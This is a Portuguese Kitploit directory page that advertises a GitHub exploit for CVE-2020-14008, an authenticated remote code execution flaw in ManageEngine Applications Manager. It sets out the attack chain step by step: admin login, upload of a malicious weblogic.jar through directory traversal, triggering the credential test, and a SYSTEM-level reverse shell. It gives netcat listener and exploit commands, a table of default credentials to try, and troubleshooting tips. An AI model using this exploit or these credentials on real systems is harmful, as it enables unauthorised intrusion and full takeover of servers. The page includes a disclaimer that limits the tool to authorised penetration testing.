Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE | Kitploit
Ferramentas/GitHubGitHub/0x0d3ad/cve-2020-14008
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

Ver Repositório
31há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-14008 - RCE no ManageEngine Applications Manager

Execução Remota de Código Autenticada via Upload Arbitrário de Arquivos no Zoho ManageEngine Applications Manager (versões <= 14720).

Resumo da Vulnerabilidade

DetalheValor
CVECVE-2020-14008
CVSS7.2 (Alto)
TipoRCE Autenticada / Upload Arbitrário de Arquivos
ProdutoZoho ManageEngine Applications Manager
AfetadoVersão 14720 e anteriores
RequisitoCredenciais de administrador válidas
ResultadoReverse shell nível SYSTEM

O exploit abusa do recurso de teste de credenciais do monitor Weblogic. Um administrador autenticado faz upload de um arquivo weblogic.jar malicioso para o caminho esperado da biblioteca Weblogic. Quando o teste de credenciais é acionado, o ManageEngine carrega weblogic.jndi.Environment do JAR enviado via JarLoader.loadClass() e newInstance(), executando código Java arbitrário.

Requisitos

Sistema

  • Python 3.x
  • Java JDK (javac e jar no PATH)
  • nc (netcat) para capturar reverse shell

Dependências Python

root@kitploit:~
pip3 install requests urllib3 lxml

Uso

1. Iniciar Listener

root@kitploit:~
nc -lvnp 1337

2. Executar Exploit

root@kitploit:~
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

Exemplos

root@kitploit:~
# Básico
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

Fluxo do Exploit

  1. Login - Autenticar com credenciais de administrador, obter cookie de sessão
  2. Enumeração - Recuperar o diretório de instalação base do ManageEngine
  3. Construir JAR - Compilar uma classe Java maliciosa (weblogic.jndi.Environment) contendo um reverse shell em weblogic.jar
  4. Upload - Enviar o JAR para classes/weblogic/version8/ via directory traversal (fallback: criar uma tarefa agendada para movê-lo)
  5. Disparo - Invocar o teste de credenciais Weblogic em /testCredential.do, que carrega e instancia a classe maliciosa
  6. Shell - Reverse shell conecta de volta ao listener

Credenciais Padrão

UsuárioSenha
adminadmin
adminpassword
administratoradministrator
guestguest

Solução de Problemas

Referências

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • Aviso do ManageEngine

Aviso Legal

Esta ferramenta é fornecida apenas para testes de penetração autorizados e pesquisa em segurança. O uso não autorizado contra sistemas que você não possui ou sem permissão para testar é ilegal.

Baixar ferramenta
ErroSolução
release version 7 not supportedJava 21+ abandonou o target Java 7. Script usa --release 8
FileNotFoundError: weblogic.jarFalha na compilação do JAR. Verifique se javac e jar estão no PATH
No valid response from used sessionCredenciais inválidas
Actionname not foundFalha na criação da tarefa, verifique as permissões de administrador